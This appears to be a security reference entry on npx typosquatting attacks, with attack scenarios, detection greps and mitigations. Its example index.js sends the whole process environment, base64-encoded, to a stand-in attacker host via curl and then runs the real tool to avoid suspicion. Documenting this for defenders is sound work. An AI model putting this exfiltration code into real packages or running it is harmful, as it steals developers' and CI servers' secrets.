npx Remote Execution

npm Code Execution high Linux macOS Windows
npx is a convenience tool that downloads and immediately executes packages from the npm registry without requiring an explicit install step. This makes typosquatting attacks especially dangerous, as a misspelled package name in an npx command results in arbitrary code execution with no prior review. Attackers register typosquat variants of popular CLI tools and wait for developers or CI/CD scripts to accidentally invoke them via npx.

Prerequisites

  • Target must use npx to run packages by name
  • Attacker must register a typosquat or similarly-named package on the npm registry

Attack Scenarios

Typosquatting a Popular CLI Tool via npx

An attacker registers packages with common misspellings of popular npx targets such as 'create-raect-app' or 'creat-react-app'. When a developer mistypes the npx command, the malicious package is downloaded and executed immediately, running attacker-controlled code.

Victim accidentally typos a popular npx command
npx create-raect-app my-project
# Downloads and executes the typosquat package immediately
Malicious typosquat package.json with bin entry
{
  "name": "create-raect-app",
  "version": "1.0.0",
  "bin": {
    "create-raect-app": "./index.js"
  }
}
Malicious index.js executed by npx
#!/usr/bin/env node
const { execSync } = require('child_process');
execSync('curl https://evil.example.com/collect?env=' +
  Buffer.from(JSON.stringify(process.env)).toString('base64'));
// Then proxy to the real tool to avoid suspicion
execSync('npx create-react-app ' + process.argv.slice(2).join(' '),
  { stdio: 'inherit' });

Exploiting npx Auto-Install in CI/CD Pipelines

CI/CD scripts frequently use npx to run build tools without managing local installations. An attacker who can influence the package name (via a PR to a build script, or by registering a package that a build step references) can achieve code execution on the build server.

Vulnerable CI/CD script using npx with unverified package
# .github/workflows/build.yml
steps:
  - run: npx some-build-tool --config build.json
  # If 'some-build-tool' is unclaimed or typosquatted,
  # attacker code runs on the CI server

Detection

Audit npx Usage in Scripts and CI/CD

Search your codebase and CI/CD configurations for npx invocations. Verify that each referenced package is legitimate and owned by a trusted publisher.

grep -rn 'npx ' .github/ scripts/ Makefile package.json 2>/dev/null

Check for npx Auto-Install Prompts

In npm v7+, npx prompts before installing unknown packages. Ensure CI/CD environments do not use the --yes flag indiscriminately, which bypasses this safety prompt.

grep -rn 'npx --yes\|npx -y' .github/ scripts/ 2>/dev/null

Mitigation

  • Prefer installing CLI tools explicitly with npm install before invoking them, rather than relying on npx auto-download
  • Never use npx --yes in CI/CD scripts without verifying the exact package name and publisher
  • Use npx with fully qualified versioned package names (e.g., npx create-react-app@5.0.1) to reduce typosquatting risk
  • Audit all npx invocations in CI/CD pipelines and developer onboarding documentation for accuracy
  • Consider using Corepack or volta for managing CLI tool versions instead of relying on npx

References